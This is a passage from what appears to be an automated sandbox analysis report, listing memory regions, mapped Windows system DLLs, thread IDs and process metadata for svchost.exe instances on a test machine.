"c:\\users\\ciihmnxmn6ps\\appdata\\local\\tiledatalayer\\database\\vedatamodel.edb") Region: id = 1826 start_va = 0xdaf8a30000 end_va = 0xdaf8b2ffff entry_point = 0x0 region_type = private name = "private_0x000000daf8a30000" filename = "" Region: id = 1827 start_va = 0xdaf8b30000 end_va = 0xdaf8b3ffff entry_point = 0xdaf8b30000 region_type = mapped_file name = "vedatamodel.edb" filename = "\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\TileDataLayer\\Database\\vedatamodel.edb" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\tiledatalayer\\database\\vedatamodel.edb") Region: id = 1828 start_va = 0xdaf8b40000 end_va = 0xdaf8b4ffff entry_point = 0xdaf8b40000 region_type = mapped_file name = "vedatamodel.edb" filename = "\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\TileDataLayer\\Database\\vedatamodel.edb" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\tiledatalayer\\database\\vedatamodel.edb") Region: id = 1829 start_va = 0xdaf8b50000 end_va = 0xdaf8b5ffff entry_point = 0xdaf8b50000 region_type = mapped_file name = "vedatamodel.edb" filename = "\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\TileDataLayer\\Database\\vedatamodel.edb" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\tiledatalayer\\database\\vedatamodel.edb") Region: id = 1830 start_va = 0xdaf8b60000 end_va = 0xdaf8b6ffff entry_point = 0xdaf8b60000 region_type = mapped_file name = "vedatamodel.edb" filename = "\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\TileDataLayer\\Database\\vedatamodel.edb" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\tiledatalayer\\database\\vedatamodel.edb") Region: id = 1831 start_va = 0xdaf8b70000 end_va = 0xdaf8b70fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000daf8b70000" filename = "" Region: id = 1832 start_va = 0xdaf8b80000 end_va = 0xdaf8b8ffff entry_point = 0xdaf8b80000 region_type = mapped_file name = "vedatamodel.edb" filename = "\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\TileDataLayer\\Database\\vedatamodel.edb" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\tiledatalayer\\database\\vedatamodel.edb") Region: id = 1833 start_va = 0xdaf8b90000 end_va = 0xdaf8b9ffff entry_point = 0xdaf8b90000 region_type = mapped_file name = "vedatamodel.edb" filename = "\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\TileDataLayer\\Database\\vedatamodel.edb" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\tiledatalayer\\database\\vedatamodel.edb") Region: id = 1834 start_va = 0xdaf8ba0000 end_va = 0xdaf8baffff entry_point = 0xdaf8ba0000 region_type = mapped_file name = "vedatamodel.edb" filename = "\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\TileDataLayer\\Database\\vedatamodel.edb" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\tiledatalayer\\database\\vedatamodel.edb") Region: id = 1835 start_va = 0xdaf8bb0000 end_va = 0xdaf8bbffff entry_point = 0xdaf8bb0000 region_type = mapped_file name = "vedatamodel.edb" filename = "\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\TileDataLayer\\Database\\vedatamodel.edb" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\tiledatalayer\\database\\vedatamodel.edb") Region: id = 1836 start_va = 0xdaf8bc0000 end_va = 0xdaf8bcffff entry_point = 0xdaf8bc0000 region_type = mapped_file name = "vedatamodel.edb" filename = "\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\TileDataLayer\\Database\\vedatamodel.edb" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\tiledatalayer\\database\\vedatamodel.edb") Region: id = 1837 start_va = 0xdaf8bd0000 end_va = 0xdaf8bdffff entry_point = 0xdaf8bd0000 region_type = mapped_file name = "vedatamodel.edb" filename = "\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\TileDataLayer\\Database\\vedatamodel.edb" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\tiledatalayer\\database\\vedatamodel.edb") Region: id = 1838 start_va = 0xdaf8be0000 end_va = 0xdaf8beffff entry_point = 0xdaf8be0000 region_type = mapped_file name = "vedatamodel.edb" filename = "\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\TileDataLayer\\Database\\vedatamodel.edb" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\tiledatalayer\\database\\vedatamodel.edb") Region: id = 1839 start_va = 0xdaf8bf0000 end_va = 0xdaf8bfffff entry_point = 0xdaf8bf0000 region_type = mapped_file name = "vedatamodel.edb" filename = "\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\TileDataLayer\\Database\\vedatamodel.edb" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\tiledatalayer\\database\\vedatamodel.edb") Region: id = 1840 start_va = 0xdaf8c00000 end_va = 0xdaf8c0ffff entry_point = 0xdaf8c00000 region_type = mapped_file name = "vedatamodel.edb" filename = "\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\TileDataLayer\\Database\\vedatamodel.edb" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\tiledatalayer\\database\\vedatamodel.edb") Region: id = 1841 start_va = 0xdaf8c10000 end_va = 0xdaf8c1ffff entry_point = 0xdaf8c10000 region_type = mapped_file name = "vedatamodel.edb" filename = "\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\TileDataLayer\\Database\\vedatamodel.edb" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\tiledatalayer\\database\\vedatamodel.edb") Region: id = 1842 start_va = 0xdaf8c20000 end_va = 0xdaf8c2ffff entry_point = 0xdaf8c20000 region_type = mapped_file name = "vedatamodel.edb" filename = "\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\TileDataLayer\\Database\\vedatamodel.edb" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\tiledatalayer\\database\\vedatamodel.edb") Region: id = 1843 start_va = 0xdaf8c30000 end_va = 0xdaf8c3ffff entry_point = 0xdaf8c30000 region_type = mapped_file name = "vedatamodel.edb" filename = "\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\TileDataLayer\\Database\\vedatamodel.edb" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\tiledatalayer\\database\\vedatamodel.edb") Region: id = 1844 start_va = 0xdaf8c40000 end_va = 0xdaf8c4ffff entry_point = 0xdaf8c40000 region_type = mapped_file name = "vedatamodel.edb" filename = "\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\TileDataLayer\\Database\\vedatamodel.edb" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\tiledatalayer\\database\\vedatamodel.edb") Region: id = 1845 start_va = 0xdaf8c50000 end_va = 0xdaf8c5ffff entry_point = 0xdaf8c50000 region_type = mapped_file name = "vedatamodel.edb" filename = "\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\TileDataLayer\\Database\\vedatamodel.edb" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\tiledatalayer\\database\\vedatamodel.edb") Region: id = 1846 start_va = 0xdaf8c60000 end_va = 0xdaf8c6ffff entry_point = 0xdaf8c60000 region_type = mapped_file name = "vedatamodel.edb" filename = "\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\TileDataLayer\\Database\\vedatamodel.edb" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\tiledatalayer\\database\\vedatamodel.edb") Region: id = 1847 start_va = 0xdaf8c70000 end_va = 0xdaf8c7ffff entry_point = 0xdaf8c70000 region_type = mapped_file name = "vedatamodel.edb" filename = "\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\TileDataLayer\\Database\\vedatamodel.edb" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\tiledatalayer\\database\\vedatamodel.edb") Region: id = 1848 start_va = 0xdaf8c80000 end_va = 0xdaf8c8ffff entry_point = 0xdaf8c80000 region_type = mapped_file name = "vedatamodel.edb" filename = "\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\TileDataLayer\\Database\\vedatamodel.edb" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\tiledatalayer\\database\\vedatamodel.edb") Region: id = 1849 start_va = 0xdaf8c90000 end_va = 0xdaf8c9ffff entry_point = 0xdaf8c90000 region_type = mapped_file name = "vedatamodel.edb" filename = "\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\TileDataLayer\\Database\\vedatamodel.edb" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\tiledatalayer\\database\\vedatamodel.edb") Region: id = 1850 start_va = 0xdaf8ca0000 end_va = 0xdaf8caffff entry_point = 0xdaf8ca0000 region_type = mapped_file name = "vedatamodel.edb" filename = "\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\TileDataLayer\\Database\\vedatamodel.edb" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\tiledatalayer\\database\\vedatamodel.edb") Region: id = 1851 start_va = 0xdaf8cb0000 end_va = 0xdaf8cbffff entry_point = 0xdaf8cb0000 region_type = mapped_file name = "vedatamodel.edb" filename = "\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\TileDataLayer\\Database\\vedatamodel.edb" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\tiledatalayer\\database\\vedatamodel.edb") Region: id = 1852 start_va = 0xdaf8cc0000 end_va = 0xdaf8ccffff entry_point = 0xdaf8cc0000 region_type = mapped_file name = "vedatamodel.edb" filename = "\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\TileDataLayer\\Database\\vedatamodel.edb" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\tiledatalayer\\database\\vedatamodel.edb") Region: id = 1853 start_va = 0xdaf8cd0000 end_va = 0xdaf8cd0fff entry_point = 0x0 region_type = private name = "private_0x000000daf8cd0000" filename = "" Region: id = 1854 start_va = 0xdaf8ce0000 end_va = 0xdaf8ceffff entry_point = 0xdaf8ce0000 region_type = mapped_file name = "vedatamodel.edb" filename = "\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\TileDataLayer\\Database\\vedatamodel.edb" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\tiledatalayer\\database\\vedatamodel.edb") Region: id = 1855 start_va = 0xdaf8cf0000 end_va = 0xdaf8cfffff entry_point = 0xdaf8cf0000 region_type = mapped_file name = "vedatamodel.edb" filename = "\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\TileDataLayer\\Database\\vedatamodel.edb" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\tiledatalayer\\database\\vedatamodel.edb") Region: id = 1856 start_va = 0xdaf8d00000 end_va = 0xdaf8d0ffff entry_point = 0xdaf8d00000 region_type = mapped_file name = "vedatamodel.edb" filename = "\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\TileDataLayer\\Database\\vedatamodel.edb" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\tiledatalayer\\database\\vedatamodel.edb") Region: id = 1857 start_va = 0xdaf8d10000 end_va = 0xdaf8d1ffff entry_point = 0xdaf8d10000 region_type = mapped_file name = "vedatamodel.edb" filename = "\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\TileDataLayer\\Database\\vedatamodel.edb" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\tiledatalayer\\database\\vedatamodel.edb") Region: id = 1858 start_va = 0xdaf8d20000 end_va = 0xdaf8d2ffff entry_point = 0xdaf8d20000 region_type = mapped_file name = "vedatamodel.edb" filename = "\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\TileDataLayer\\Database\\vedatamodel.edb" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\tiledatalayer\\database\\vedatamodel.edb") Region: id = 1859 start_va = 0xdaf8d30000 end_va = 0xdaf8d3ffff entry_point = 0xdaf8d30000 region_type = mapped_file name = "vedatamodel.edb" filename = "\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\TileDataLayer\\Database\\vedatamodel.edb" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\tiledatalayer\\database\\vedatamodel.edb") Region: id = 1860 start_va = 0xdaf8d40000 end_va = 0xdaf8d4ffff entry_point = 0xdaf8d40000 region_type = mapped_file name = "vedatamodel.edb" filename = "\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\TileDataLayer\\Database\\vedatamodel.edb" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\tiledatalayer\\database\\vedatamodel.edb") Region: id = 1861 start_va = 0xdaf8d50000 end_va = 0xdaf8d5ffff entry_point = 0xdaf8d50000 region_type = mapped_file name = "vedatamodel.edb" filename = "\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\TileDataLayer\\Database\\vedatamodel.edb" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\tiledatalayer\\database\\vedatamodel.edb") Region: id = 1862 start_va = 0x7df5ff970000 end_va = 0x7ff5ff96ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007df5ff970000" filename = "" Region: id = 1863 start_va = 0x7ff6e08c0000 end_va = 0x7ff6e08c1fff entry_point = 0x0 region_type = private name = "private_0x00007ff6e08c0000" filename = "" Region: id = 1864 start_va = 0x7ff6e08c4000 end_va = 0x7ff6e08c5fff entry_point = 0x0 region_type = private name = "private_0x00007ff6e08c4000" filename = "" Region: id = 1865 start_va = 0x7ff6e08ca000 end_va = 0x7ff6e08cbfff entry_point = 0x0 region_type = private name = "private_0x00007ff6e08ca000" filename = "" Region: id = 1866 start_va = 0x7ff6e08cc000 end_va = 0x7ff6e08cdfff entry_point = 0x0 region_type = private name = "private_0x00007ff6e08cc000" filename = "" Region: id = 1867 start_va = 0x7ff6e08ce000 end_va = 0x7ff6e08cffff entry_point = 0x0 region_type = private name = "private_0x00007ff6e08ce000" filename = "" Region: id = 1868 start_va = 0x7ff6e08d0000 end_va = 0x7ff6e09cffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007ff6e08d0000" filename = "" Region: id = 1869 start_va = 0x7ff6e09d0000 end_va = 0x7ff6e09f2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007ff6e09d0000" filename = "" Region: id = 1870 start_va = 0x7ff6e09f6000 end_va = 0x7ff6e09f6fff entry_point = 0x0 region_type = private name = "private_0x00007ff6e09f6000" filename = "" Region: id = 1871 start_va = 0x7ff6e09fa000 end_va = 0x7ff6e09fbfff entry_point = 0x0 region_type = private name = "private_0x00007ff6e09fa000" filename = "" Region: id = 1872 start_va = 0x7ff6e09fe000 end_va = 0x7ff6e09fffff entry_point = 0x0 region_type = private name = "private_0x00007ff6e09fe000" filename = "" Region: id = 1873 start_va = 0x7ff6e1100000 end_va = 0x7ff6e110cfff entry_point = 0x7ff6e1100000 region_type = mapped_file name = "svchost.exe" filename = "\\Windows\\System32\\svchost.exe" (normalized: "c:\\windows\\system32\\svchost.exe") Region: id = 1874 start_va = 0x7ffc46310000 end_va = 0x7ffc463a8fff entry_point = 0x7ffc46310000 region_type = mapped_file name = "staterepository.core.dll" filename = "\\Windows\\System32\\StateRepository.Core.dll" (normalized: "c:\\windows\\system32\\staterepository.core.dll") Region: id = 1875 start_va = 0x7ffc463b0000 end_va = 0x7ffc46641fff entry_point = 0x7ffc463b0000 region_type = mapped_file name = "windows.staterepository.dll" filename = "\\Windows\\System32\\Windows.StateRepository.dll" (normalized: "c:\\windows\\system32\\windows.staterepository.dll") Region: id = 1876 start_va = 0x7ffc48ff0000 end_va = 0x7ffc49459fff entry_point = 0x7ffc48ff0000 region_type = mapped_file name = "actxprxy.dll" filename = "\\Windows\\System32\\actxprxy.dll" (normalized: "c:\\windows\\system32\\actxprxy.dll") Region: id = 1877 start_va = 0x7ffc4af30000 end_va = 0x7ffc4afb0fff entry_point = 0x7ffc4af30000 region_type = mapped_file name = "tileobjserver.dll" filename = "\\Windows\\System32\\tileobjserver.dll" (normalized: "c:\\windows\\system32\\tileobjserver.dll") Region: id = 1878 start_va = 0x7ffc4b540000 end_va = 0x7ffc4b6d6fff entry_point = 0x7ffc4b540000 region_type = mapped_file name = "urlmon.dll" filename = "\\Windows\\System32\\urlmon.dll" (normalized: "c:\\windows\\system32\\urlmon.dll") Region: id = 1879 start_va = 0x7ffc4bc70000 end_va = 0x7ffc4bf51fff entry_point = 0x7ffc4bc70000 region_type = mapped_file name = "esent.dll" filename = "\\Windows\\System32\\esent.dll" (normalized: "c:\\windows\\system32\\esent.dll") Region: id = 1880 start_va = 0x7ffc4ddd0000 end_va = 0x7ffc4e145fff entry_point = 0x7ffc4ddd0000 region_type = mapped_file name = "iertutil.dll" filename = "\\Windows\\System32\\iertutil.dll" (normalized: "c:\\windows\\system32\\iertutil.dll") Region: id = 1881 start_va = 0x7ffc4f1f0000 end_va = 0x7ffc4f2fefff entry_point = 0x7ffc4f1f0000 region_type = mapped_file name = "mrmcorer.dll" filename = "\\Windows\\System32\\MrmCoreR.dll" (normalized: "c:\\windows\\system32\\mrmcorer.dll") Region: id = 1882 start_va = 0x7ffc52640000 end_va = 0x7ffc52652fff entry_point = 0x7ffc52640000 region_type = mapped_file name = "wtsapi32.dll" filename = "\\Windows\\System32\\wtsapi32.dll" (normalized: "c:\\windows\\system32\\wtsapi32.dll") Region: id = 1883 start_va = 0x7ffc52660000 end_va = 0x7ffc526c5fff entry_point = 0x7ffc52660000 region_type = mapped_file name = "bcp47langs.dll" filename = "\\Windows\\System32\\BCP47Langs.dll" (normalized: "c:\\windows\\system32\\bcp47langs.dll") Region: id = 1884 start_va = 0x7ffc53720000 end_va = 0x7ffc53777fff entry_point = 0x7ffc53720000 region_type = mapped_file name = "winsta.dll" filename = "\\Windows\\System32\\winsta.dll" (normalized: "c:\\windows\\system32\\winsta.dll") Region: id = 1885 start_va = 0x7ffc53a90000 end_va = 0x7ffc53ac2fff entry_point = 0x7ffc53a90000 region_type = mapped_file name = "rsaenh.dll" filename = "\\Windows\\System32\\rsaenh.dll" (normalized: "c:\\windows\\system32\\rsaenh.dll") Region: id = 1886 start_va = 0x7ffc53b80000 end_va = 0x7ffc53b9efff entry_point = 0x7ffc53b80000 region_type = mapped_file name = "userenv.dll" filename = "\\Windows\\System32\\userenv.dll" (normalized: "c:\\windows\\system32\\userenv.dll") Region: id = 1887 start_va = 0x7ffc54210000 end_va = 0x7ffc54226fff entry_point = 0x7ffc54210000 region_type = mapped_file name = "cryptsp.dll" filename = "\\Windows\\System32\\cryptsp.dll" (normalized: "c:\\windows\\system32\\cryptsp.dll") Region: id = 1888 start_va = 0x7ffc54280000 end_va = 0x7ffc5428afff entry_point = 0x7ffc54280000 region_type = mapped_file name = "cryptbase.dll" filename = "\\Windows\\System32\\cryptbase.dll" (normalized: "c:\\windows\\system32\\cryptbase.dll") Region: id = 1889 start_va = 0x7ffc54320000 end_va = 0x7ffc5434bfff entry_point = 0x7ffc54320000 region_type = mapped_file name = "sspicli.dll" filename = "\\Windows\\System32\\sspicli.dll" (normalized: "c:\\windows\\system32\\sspicli.dll") Region: id = 1890 start_va = 0x7ffc543a0000 end_va = 0x7ffc543c7fff entry_point = 0x7ffc543a0000 region_type = mapped_file name = "bcrypt.dll" filename = "\\Windows\\System32\\bcrypt.dll" (normalized: "c:\\windows\\system32\\bcrypt.dll") Region: id = 1891 start_va = 0x7ffc543d0000 end_va = 0x7ffc5443afff entry_point = 0x7ffc543d0000 region_type = mapped_file name = "bcryptprimitives.dll" filename = "\\Windows\\System32\\bcryptprimitives.dll" (normalized: "c:\\windows\\system32\\bcryptprimitives.dll") Region: id = 1892 start_va = 0x7ffc54580000 end_va = 0x7ffc54592fff entry_point = 0x7ffc54580000 region_type = mapped_file name = "profapi.dll" filename = "\\Windows\\System32\\profapi.dll" (normalized: "c:\\windows\\system32\\profapi.dll") Region: id = 1893 start_va = 0x7ffc545a0000 end_va = 0x7ffc545e9fff entry_point = 0x7ffc545a0000 region_type = mapped_file name = "powrprof.dll" filename = "\\Windows\\System32\\powrprof.dll" (normalized: "c:\\windows\\system32\\powrprof.dll") Region: id = 1894 start_va = 0x7ffc54610000 end_va = 0x7ffc5461efff entry_point = 0x7ffc54610000 region_type = mapped_file name = "kernel.appcore.dll" filename = "\\Windows\\System32\\kernel.appcore.dll" (normalized: "c:\\windows\\system32\\kernel.appcore.dll") Region: id = 1895 start_va = 0x7ffc54670000 end_va = 0x7ffc54c97fff entry_point = 0x7ffc54670000 region_type = mapped_file name = "windows.storage.dll" filename = "\\Windows\\System32\\windows.storage.dll" (normalized: "c:\\windows\\system32\\windows.storage.dll") Region: id = 1896 start_va = 0x7ffc54f80000 end_va = 0x7ffc55032fff entry_point = 0x7ffc54f80000 region_type = mapped_file name = "shcore.dll" filename = "\\Windows\\System32\\SHCore.dll" (normalized: "c:\\windows\\system32\\shcore.dll") Region: id = 1897 start_va = 0x7ffc55040000 end_va = 0x7ffc5521cfff entry_point = 0x7ffc55040000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 1898 start_va = 0x7ffc552c0000 end_va = 0x7ffc5535cfff entry_point = 0x7ffc552c0000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 1899 start_va = 0x7ffc554e0000 end_va = 0x7ffc5562dfff entry_point = 0x7ffc554e0000 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 1900 start_va = 0x7ffc55800000 end_va = 0x7ffc558acfff entry_point = 0x7ffc55800000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 1901 start_va = 0x7ffc55910000 end_va = 0x7ffc559cdfff entry_point = 0x7ffc55910000 region_type = mapped_file name = "oleaut32.dll" filename = "\\Windows\\System32\\oleaut32.dll" (normalized: "c:\\windows\\system32\\oleaut32.dll") Region: id = 1902 start_va = 0x7ffc56f10000 end_va = 0x7ffc57094fff entry_point = 0x7ffc56f10000 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 1903 start_va = 0x7ffc570a0000 end_va = 0x7ffc571c5fff entry_point = 0x7ffc570a0000 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\System32\\rpcrt4.dll" (normalized: "c:\\windows\\system32\\rpcrt4.dll") Region: id = 1904 start_va = 0x7ffc571d0000 end_va = 0x7ffc5744bfff entry_point = 0x7ffc571d0000 region_type = mapped_file name = "combase.dll" filename = "\\Windows\\System32\\combase.dll" (normalized: "c:\\windows\\system32\\combase.dll") Region: id = 1905 start_va = 0x7ffc57540000 end_va = 0x7ffc5759afff entry_point = 0x7ffc57540000 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\System32\\sechost.dll" (normalized: "c:\\windows\\system32\\sechost.dll") Region: id = 1906 start_va = 0x7ffc578a0000 end_va = 0x7ffc578f0fff entry_point = 0x7ffc578a0000 region_type = mapped_file name = "shlwapi.dll" filename = "\\Windows\\System32\\shlwapi.dll" (normalized: "c:\\windows\\system32\\shlwapi.dll") Region: id = 1907 start_va = 0x7ffc57970000 end_va = 0x7ffc57a14fff entry_point = 0x7ffc57970000 region_type = mapped_file name = "clbcatq.dll" filename = "\\Windows\\System32\\clbcatq.dll" (normalized: "c:\\windows\\system32\\clbcatq.dll") Region: id = 1908 start_va = 0x7ffc57aa0000 end_va = 0x7ffc57b45fff entry_point = 0x7ffc57aa0000 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\System32\\advapi32.dll" (normalized: "c:\\windows\\system32\\advapi32.dll") Region: id = 1909 start_va = 0x7ffc57b50000 end_va = 0x7ffc57d11fff entry_point = 0x7ffc57b50000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Thread: id = 409 os_tid = 0xb78 Thread: id = 410 os_tid = 0xb74 Thread: id = 411 os_tid = 0xb48 Thread: id = 412 os_tid = 0xb44 Thread: id = 413 os_tid = 0xb40 Thread: id = 414 os_tid = 0x9cc Thread: id = 415 os_tid = 0x964 Thread: id = 416 os_tid = 0x960 Thread: id = 417 os_tid = 0x6e4 Thread: id = 418 os_tid = 0x6e0 Thread: id = 419 os_tid = 0x6dc Thread: id = 420 os_tid = 0x67c Thread: id = 472 os_tid = 0xe38 Process: id = "18" image_name = "svchost.exe" filename = "c:\\windows\\system32\\svchost.exe" page_root = "0x4997000" os_pid = "0xe98" os_integrity_level = "0x2000" os_privileges = "0x800000" monitor_reason = "child_process" parent_id = "4" os_parent_pid = "0x1e4" cmd_line = "C:\\Windows\\system32\\svchost.exe -k UnistackSvcGroup" cur_dir = "C:\\Windows\\system32\\" os_username = "LHNIWSJ\\CIiHmnxMn6Ps" os_groups = "LHNIWSJ\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x10], "BUILTIN\\Administrators" [0x10], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:00013da5" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 2459 start_va = 0x7ffe0000 end_va = 0x7ffeffff entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 2460 start_va = 0xb9bcae0000 end_va = 0xb9bcaeffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000b9bcae0000" filename = "" Region: id = 2461 start_va = 0xb9bcaf0000 end_va = 0xb9bcaf0fff entry_point = 0xb9bcaf0000 region_type = mapped_file name = "svchost.exe.mui" filename = "\\Windows\\System32\\en-US\\svchost.exe.mui" (normalized: "c:\\windows\\system32\\en-us\\svchost.exe.mui") Region: id = 2462 start_va = 0xb9bcb00000 end_va = 0xb9bcb13fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000b9bcb00000" filename = "" Region: id = 2463 start_va = 0xb9bcb20000 end_va = 0xb9bcb9ffff entry_point = 0x0 region_type = private name = "private_0x000000b9bcb20000" filename = "" Region: id = 2464 start_va = 0xb9bcba0000 end_va = 0xb9bcba3fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000b9bcba0000" filename = "" Region: id = 2465 start_va = 0xb9bcbb0000 end_va = 0xb9bcbb0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000b9bcbb0000" filename = "" Region: id = 2466 start_va = 0xb9bcbc0000 end_va = 0xb9bcbc1fff entry_point = 0x0 region_type = private name = "private_0x000000b9bcbc0000" filename = "" Region: id = 2467 start_va = 0xb9bcbd0000 end_va = 0xb9bcc8dfff entry_point = 0xb9bcbd0000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 2468 start_va = 0xb9bcc90000 end_va = 0xb9bcd0ffff entry_point = 0x0 region_type = private name = "private_0x000000b9bcc90000" filename = "" Region: id = 2469 start_va = 0xb9bcd10000 end_va = 0xb9bcd10fff entry_point = 0x0 region_type = private name = "private_0x000000b9bcd10000" filename = "" Region: id = 2470 start_va = 0xb9bcd20000 end_va = 0xb9bcd20fff entry_point = 0x0 region_type = private name = "private_0x000000b9bcd20000" filename = "" Region: id = 2471 start_va = 0xb9bcd30000 end_va = 0xb9bcd30fff entry_point = 0xb9bcd30000 region_type = mapped_file name = "phoneutilres.dll" filename = "\\Windows\\System32\\PhoneutilRes.dll" (normalized: "c:\\windows\\system32\\phoneutilres.dll") Region: id = 2472 start_va = 0xb9bcd50000 end_va = 0xb9bcd50fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000b9bcd50000" filename = "" Region: id = 2473 start_va = 0xb9bcd60000 end_va = 0xb9bcd60fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000b9bcd60000" filename = "" Region: id = 2474 start_va = 0xb9bcd70000 end_va = 0xb9bcd70fff entry_point = 0xb9bcd70000 region_type = mapped_file name = "syncres.dll" filename = "\\Windows\\System32\\SyncRes.dll" (normalized: "c:\\windows\\system32\\syncres.dll") Region: id = 2475 start_va = 0xb9bcd80000 end_va = 0xb9bcd86fff entry_point = 0x0 region_type = private name = "private_0x000000b9bcd80000" filename = "" Region: id = 2476 start_va = 0xb9bce00000 end_va = 0xb9bcefffff entry_point = 0x0 region_type = private name = "private_0x000000b9bce00000" filename = "" Region: id = 2477 start_va = 0xb9bcf00000 end_va = 0xb9bd087fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000b9bcf00000" filename = "" Region: id = 2478 start_va = 0xb9bd0d0000 end_va = 0xb9bd0d6fff entry_point = 0x0 region_type = private name = "private_0x000000b9bd0d0000" filename = "" Region: id = 2479 start_va = 0xb9bd100000 end_va = 0xb9bd1fffff entry_point = 0x0 region_type = private name = "private_0x000000b9bd100000" filename = "" Region: id = 2480 start_va = 0xb9bd200000 end_va = 0xb9bd380fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000b9bd200000" filename = "" Region: id = 2481 start_va = 0xb9bd390000 end_va 